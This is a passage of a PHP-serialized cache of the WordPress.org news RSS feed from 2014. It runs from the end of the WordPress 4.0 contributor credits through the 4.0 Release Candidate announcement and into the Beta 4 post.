href=\"https://profiles.wordpress.org/sabreuse\">Amy Hendrix (sabreuse)</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andrezrv\">Andres Villarreal</a>, <a href=\"https://profiles.wordpress.org/zamfeer\">Andrew Mowe</a>, <a href=\"https://profiles.wordpress.org/sumobi\">Andrew Munro (sumobi)</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andy\">Andy Skelton</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/atimmer\">Anton Timmermans</a>, <a href=\"https://profiles.wordpress.org/arnee\">Arne Brachhold</a>, <a href=\"https://profiles.wordpress.org/aubreypwd\">Aubrey Portwood</a>, <a href=\"https://profiles.wordpress.org/filosofo\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/empireoflight\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/kau-boy\">Bernhard Kau</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone Gorges</a>, <a href=\"https://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"https://profiles.wordpress.org/bramd\">Bram Duvigneau</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/krogsgard\">Brian Krogsgard</a>, <a href=\"https://profiles.wordpress.org/brianlayman\">Brian Layman</a>, <a href=\"https://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"https://profiles.wordpress.org/camdensegal\">Camden Segal</a>, <a href=\"https://profiles.wordpress.org/sixhours\">Caroline Moore</a>, <a href=\"https://profiles.wordpress.org/mackensen\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chouby\">Chouby</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/c3mdigital\">Chris Olbekson</a>, <a href=\"https://profiles.wordpress.org/chrisl27\">chrisl27</a>, <a href=\"https://profiles.wordpress.org/caxelsson\">Christian Axelsson</a>, <a href=\"https://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"https://profiles.wordpress.org/boda1982\">Christopher Spires</a>, <a href=\"https://profiles.wordpress.org/clifgriffin\">Clifton Griffin</a>, <a href=\"https://profiles.wordpress.org/jupiterwise\">Corey McKrill</a>, <a href=\"https://profiles.wordpress.org/corphi\">Corphi</a>, <a href=\"https://profiles.wordpress.org/extendwings\">Daisuke Takahashi</a>, <a href=\"https://profiles.wordpress.org/ghost1227\">Dan Griffiths</a>, <a href=\"https://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"https://profiles.wordpress.org/danielhuesken\">Daniel Husken</a>, <a href=\"https://profiles.wordpress.org/redsweater\">Daniel Jalkut (Red Sweater)</a>, <a href=\"https://profiles.wordpress.org/dannydehaan\">Danny de Haan</a>, <a href=\"https://profiles.wordpress.org/dkotter\">Darin Kotter</a>, <a href=\"https://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"https://profiles.wordpress.org/dllh\">Daryl L. L. Houston (dllh)</a>, <a href=\"https://profiles.wordpress.org/davidakennedy\">David A. Kennedy</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/dnaber-de\">David Naber</a>, <a href=\"https://profiles.wordpress.org/davidthemachine\">DavidTheMachine</a>, <a href=\"https://profiles.wordpress.org/debaat\">DeBAAT</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/donncha\">Donncha O Caoimh</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/dustyn\">Dustyn Doyle</a>, <a href=\"https://profiles.wordpress.org/eddiemoya\">Eddie Moya</a>, <a href=\"https://profiles.wordpress.org/oso96_2000\">Eduardo Reveles</a>, <a href=\"https://profiles.wordpress.org/edwin-at-studiojoyocom\">Edwin Siebel</a>, <a href=\"https://profiles.wordpress.org/ehg\">ehg</a>, <a href=\"https://profiles.wordpress.org/tmeister\">Enrique Chavez</a>, <a href=\"https://profiles.wordpress.org/erayalakese\">erayalakese</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Andrew Lewis</a>, <a href=\"https://profiles.wordpress.org/ebinnion\">Eric Binnion</a>, <a href=\"https://profiles.wordpress.org/ericmann\">Eric Mann</a>, <a href=\"https://profiles.wordpress.org/ejdanderson\">Evan Anderson</a>, <a href=\"https://profiles.wordpress.org/eherman24\">Evan Herman</a>, <a href=\"https://profiles.wordpress.org/fab1en\">Fabien Quatravaux</a>, <a href=\"https://profiles.wordpress.org/fahmiadib\">Fahmi Adib</a>, <a href=\"https://profiles.wordpress.org/feedmeastraycat\">feedmeastraycat</a>, <a href=\"https://profiles.wordpress.org/frank-klein\">Frank Klein</a>, <a href=\"https://profiles.wordpress.org/garhdez\">garhdez</a>, <a href=\"https://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"https://profiles.wordpress.org/garyj\">Gary Jones</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/garza\">garza</a>, <a href=\"https://profiles.wordpress.org/gauravmittal1995\">gauravmittal1995</a>, <a href=\"https://profiles.wordpress.org/gavra\">Gavrisimo</a>, <a href=\"https://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/grahamarmfield\">Graham Armfield</a>, <a href=\"https://profiles.wordpress.org/vancoder\">Grant Mangham</a>, <a href=\"https://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"https://profiles.wordpress.org/bordoni\">Gustavo Bordoni</a>, <a href=\"https://profiles.wordpress.org/harrym\">harrym</a>, <a href=\"https://profiles.wordpress.org/hebbet\">hebbet</a>, <a href=\"https://profiles.wordpress.org/hinnerk\">Hinnerk Altenburg</a>, <a href=\"https://profiles.wordpress.org/hlashbrooke\">Hugh Lashbrooke</a>, <a href=\"https://profiles.wordpress.org/iljoja\">iljoja</a>, <a href=\"https://profiles.wordpress.org/imath\">imath</a>, <a href=\"https://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"https://profiles.wordpress.org/issuu\">issuu</a>, <a href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a href=\"https://profiles.wordpress.org/jacklenox\">Jack Lenox</a>, <a href=\"https://profiles.wordpress.org/jackreichert\">Jack Reichert</a>, <a href=\"https://profiles.wordpress.org/jacobdubail\">Jacob Dubail</a>, <a href=\"https://profiles.wordpress.org/janhenkg\">JanHenkG</a>, <a href=\"https://profiles.wordpress.org/avryl\">Janneke Van Dorpe</a>, <a href=\"https://profiles.wordpress.org/jwenerd\">Jared Wenerd</a>, <a href=\"https://profiles.wordpress.org/jaza613\">Jaza613</a>, <a href=\"https://profiles.wordpress.org/jeffstieler\">Jeff Stieler</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/jpry\">Jeremy Pry</a>, <a href=\"https://profiles.wordpress.org/slimndap\">Jeroen Schmit</a>, <a href=\"https://profiles.wordpress.org/jerrysarcastic\">Jerry Bates (jerrysarcastic)</a>, <a href=\"https://profiles.wordpress.org/jesin\">Jesin A</a>, <a href=\"https://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"https://profiles.wordpress.org/engelen\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jesper800\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jessepollak\">Jesse Pollak</a>, <a href=\"https://profiles.wordpress.org/jgadbois\">jgadbois</a>, <a href=\"https://profiles.wordpress.org/jartes\">Joan Artes</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joehoyle\">Joe Hoyle</a>, <a href=\"https://profiles.wordpress.org/jkudish\">Joey Kudish</a>, <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/johnjamesjacoby\">John James Jacoby</a>, <a href=\"https://profiles.wordpress.org/johnzanussi\">John Zanussi</a>, <a href=\"https://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"https://profiles.wordpress.org/jonnyauk\">jonnyauk</a>, <a href=\"https://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"https://profiles.wordpress.org/softmodeling\">Jordi Cabot</a>, <a href=\"https://profiles.wordpress.org/jjeaton\">Josh Eaton</a>, <a href=\"https://profiles.wordpress.org/tai\">JOTAKI Taisuke</a>, <a href=\"https://profiles.wordpress.org/juliobox\">Julio Potier</a>, <a href=\"https://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"https://profiles.wordpress.org/jtsternberg\">Justin Sternberg</a>, <a href=\"https://profiles.wordpress.org/greenshady\">Justin Tadlock</a>, <a href=\"https://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"https://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"https://profiles.wordpress.org/kapeels\">kapeels</a>, <a href=\"https://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/kevinlangleyjr\">Kevin Langley</a>, <a href=\"https://profiles.wordpress.org/kworthington\">Kevin Worthington</a>, <a href=\"https://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"https://profiles.wordpress.org/kwight\">Kirk Wight</a>, <a href=\"https://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"https://profiles.wordpress.org/ixkaito\">Kite</a>, <a href=\"https://profiles.wordpress.org/knutsp\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"https://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"https://profiles.wordpress.org/leewillis77\">Lee Willis</a>, <a href=\"https://profiles.wordpress.org/lessbloat\">lessbloat</a>, <a href=\"https://profiles.wordpress.org/layotte\">Lew Ayotte</a>, <a href=\"https://profiles.wordpress.org/lritter\">lritter</a>, <a href=\"https://profiles.wordpress.org/lukecarbis\">Luke Carbis</a>, <a href=\"https://profiles.wordpress.org/lgedeon\">Luke Gedeon</a>, <a href=\"https://profiles.wordpress.org/m_i_n\">m_i_n</a>, <a href=\"https://profiles.wordpress.org/funkatronic\">Manny Fleurmond</a>, <a href=\"https://profiles.wordpress.org/targz-1\">Manuel Schmalstieg</a>, <a href=\"https://profiles.wordpress.org/clorith\">Marius (Clorith)</a>, <a href=\"https://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"https://profiles.wordpress.org/mjbanks\">Matt Banks</a>, <a href=\"https://profiles.wordpress.org/sivel\">Matt Martz</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"https://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mdbitz\">Matthew Denton</a>, <a href=\"https://profiles.wordpress.org/mattheweppelsheimer\">Matthew Eppelsheimer</a>, <a href=\"https://profiles.wordpress.org/mattheu\">Matthew Haines-Young</a>, <a href=\"https://profiles.wordpress.org/mattyrob\">mattyrob</a>, <a href=\"https://profiles.wordpress.org/meekyhwang\">meekyhwang</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/michalzuber\">michalzuber</a>, <a href=\"https://profiles.wordpress.org/midxcat\">midxcat</a>, <a href=\"https://profiles.wordpress.org/mauteri\">Mike Auteri</a>, <a href=\"https://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"https://profiles.wordpress.org/mikejolley\">Mike Jolley</a>, <a href=\"https://profiles.wordpress.org/mikelittle\">Mike Little</a>, <a href=\"https://profiles.wordpress.org/mikemanger\">Mike Manger</a>, <a href=\"https://profiles.wordpress.org/mnelson4\">Mike Nelson</a>, <a href=\"https://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/dimadin\">Milan Dinic</a>, <a href=\"https://profiles.wordpress.org/morganestes\">Morgan Estes</a>, <a href=\"https://profiles.wordpress.org/usermrpapa\">Mr Papa</a>, <a href=\"https://profiles.wordpress.org/mrmist\">mrmist</a>, <a href=\"https://profiles.wordpress.org/m_uysl\">Mustafa Uysal</a>, <a href=\"https://profiles.wordpress.org/muvimotv\">MuViMoTV</a>, <a href=\"https://profiles.wordpress.org/nabil_kadimi\">nabil_kadimi</a>, <a href=\"https://profiles.wordpress.org/namibia\">Namibia</a>, <a href=\"https://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"https://profiles.wordpress.org/nd987\">nd987</a>, <a href=\"https://profiles.wordpress.org/neil_pie\">Neil Pie</a>, <a href=\"https://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"https://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"https://profiles.wordpress.org/nbachiyski\">Nikolay Bachiyski</a>, <a href=\"https://profiles.wordpress.org/schoenwaldnils\">Nils Schonwald</a>, <a href=\"https://profiles.wordpress.org/ninos-ego\">Ninos</a>, <a href=\"https://profiles.wordpress.org/nvwd\">Nowell VanHoesen</a>, <a href=\"https://profiles.wordpress.org/compute\">Patrick Hesselberg</a>, <a href=\"https://profiles.wordpress.org/pbearne\">Paul Bearne</a>, <a href=\"https://profiles.wordpress.org/pdclark\">Paul Clark</a>, <a href=\"https://profiles.wordpress.org/paulschreiber\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulwilde\">Paul Wilde</a>, <a href=\"https://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"https://profiles.wordpress.org/philipjohn\">Philip John</a>, <a href=\"https://profiles.wordpress.org/senlin\">Piet Bos</a>, <a href=\"https://profiles.wordpress.org/psoluch\">Piotr Soluch</a>, <a href=\"https://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"https://profiles.wordpress.org/purzlbaum\">purzlbaum</a>, <a href=\"https://profiles.wordpress.org/rachelbaker\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/rclations\">RC Lations</a>, <a href=\"https://profiles.wordpress.org/iamfriendly\">Richard Tape</a>, <a href=\"https://profiles.wordpress.org/rickalee\">Ricky Lee Whittemore</a>, <a href=\"https://profiles.wordpress.org/rob1n\">rob1n</a>, <a href=\"https://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/rdall\">Robert Dall</a>, <a href=\"https://profiles.wordpress.org/harmr\">RobertHarm</a>, <a href=\"https://profiles.wordpress.org/rohan013\">Rohan Rawat</a>, <a href=\"https://profiles.wordpress.org/rhurling\">Rouven Hurling</a>, <a href=\"https://profiles.wordpress.org/ruudjoyo\">Ruud Laan</a>, <a href=\"https://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/sammybeats\">Sam Brodie</a>, <a href=\"https://profiles.wordpress.org/otto42\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/sathishn\">Sathish Nagarajan</a>, <a href=\"https://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/greglone\">ScreenfeedFr</a>, <a href=\"https://profiles.wordpress.org/scribu\">scribu</a>, <a href=\"https://profiles.wordpress.org/seanchayes\">Sean Hayes</a>, <a href=\"https://profiles.wordpress.org/nessworthy\">Sean Nessworthy</a>, <a href=\"https://profiles.wordpress.org/sergejmueller\">Sergej Muller</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shanebp\">shanebp</a>, <a href=\"https://profiles.wordpress.org/sharonaustin\">Sharon Austin</a>, <a href=\"https://profiles.wordpress.org/shaunandrews\">Shaun Andrews</a>, <a href=\"https://profiles.wordpress.org/simonp303\">Simon Pollard</a>, <a href=\"https://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/slobodanmanic\">Slobodan Manic</a>, <a href=\"https://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"https://profiles.wordpress.org/sphoid\">sphoid</a>, <a href=\"https://profiles.wordpress.org/stephdau\">Stephane Daury</a>, <a href=\"https://profiles.wordpress.org/netweb\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stompweb\">Steven Jones</a>, <a href=\"https://profiles.wordpress.org/strangerstudios\">strangerstudios</a>, <a href=\"https://profiles.wordpress.org/5um17\">Sumit Singh</a>, <a href=\"https://profiles.wordpress.org/t4k1s\">t4k1s</a>, <a href=\"https://profiles.wordpress.org/iamtakashi\">Takashi Irie</a>, <a href=\"https://profiles.wordpress.org/taylorde\">Taylor Dewey</a>, <a href=\"https://profiles.wordpress.org/thomasvanderbeek\">Thomas van der Beek</a>, <a href=\"https://profiles.wordpress.org/tillkruess\">Till Kruss</a>, <a href=\"https://profiles.wordpress.org/codenameeli\">Tim \'Eli\' Dalbey</a>, <a href=\"https://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tjnowell\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/willmot\">Tom Willmot</a>, <a href=\"https://profiles.wordpress.org/topher1kenobe\">Topher</a>, <a href=\"https://profiles.wordpress.org/torresga\">torresga</a>, <a href=\"https://profiles.wordpress.org/liljimmi\">Tracy Levesque</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/treyhunner\">treyhunner</a>, <a href=\"https://profiles.wordpress.org/umeshsingla\">Umesh Kumar</a>, <a href=\"https://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"https://profiles.wordpress.org/vlajos\">vlajos</a>, <a href=\"https://profiles.wordpress.org/voldemortensen\">voldemortensen</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/winterdev\">winterDev</a>, <a href=\"https://profiles.wordpress.org/wojtekszkutnik\">Wojtek Szkutnik</a>, <a href=\"https://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a href=\"https://profiles.wordpress.org/katzwebdesign\">Zack Katz</a>, <a href=\"https://profiles.wordpress.org/tollmanz\">Zack Tollman</a>, and <a href=\"https://profiles.wordpress.org/zoerooney\">Zoe Rooney</a>. Also thanks to <a href=\"http://michaelpick.wordpress.com/\">Michael Pick</a> for producing the release video, and Helen with <a href=\"http://adriansandi.com\">Adrián Sandí</a> for the music.</p>\n<p>If you want to follow along or help out, check out <a href=\"https://make.wordpress.org/\">Make WordPress</a> and our <a href=\"https://make.wordpress.org/core/\">core development blog</a>. Thanks for choosing WordPress. See you soon for version 4.1!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/news/2014/09/benny/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.0 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Aug 2014 12:20:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3287\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:321:\"The first release candidate for WordPress 4.0 is now available! In RC 1, we’ve made refinements to what we&#8217;ve been working on for this release. Check out the Beta 1 announcement post for more details on those features. We hope to ship WordPress 4.0 next week, but we need your help to get there. If you [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Helen Hou-Sandi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2134:\"<p>The first release candidate for WordPress 4.0 is now available!</p>\n<p>In RC 1, we’ve made refinements to what we&#8217;ve been working on for this release. Check out the <a href=\"https://wordpress.org/news/2014/07/wordpress-4-0-beta-1/\">Beta 1 announcement post</a> for more details on those features. We hope to ship WordPress 4.0 <em>next week</em>, but we need your help to get there. If you haven’t tested 4.0 yet, there’s no time like the present. (Please, not on a production site, unless you’re adventurous.)</p>\n<p><strong>Think you’ve found a bug? </strong>Please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area in the support forums</a>. If any known issues come up, you’ll be able to <a href=\"https://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>To test WordPress 4.0 RC1, try the <a href=\"https://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.0-RC1.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.0, visit the awesome About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png?w=692\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar).</p>\n<p><strong>Developers,</strong> please test your plugins and themes against WordPress 4.0 and update your plugin&#8217;s <em>Tested up to</em> version in the readme to 4.0 before next week. If you find compatibility problems, please be sure to post any issues to the support forums so we can figure those out before the final release. You also may want to <a href=\"https://make.wordpress.org/core/2014/08/21/introducing-plugin-icons-in-the-plugin-installer/\">give your plugin an icon</a>, which we launched last week and will appear in the dashboard along with banners.</p>\n<p><em>It is almost time</em><br />\n<em> For the 4.0 release</em><br />\n<em> And its awesomeness</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.0 Beta 4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 15 Aug 2014 05:06:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3280\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:353:\"The fourth and likely final beta for WordPress 4.0 is now available. We&#8217;ve made more than 250 changes in the past month, including: Further improvements to the editor scrolling experience, especially when it comes to the second column of boxes. Better handling of small screens in the media library modals. A separate bulk selection mode [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Helen 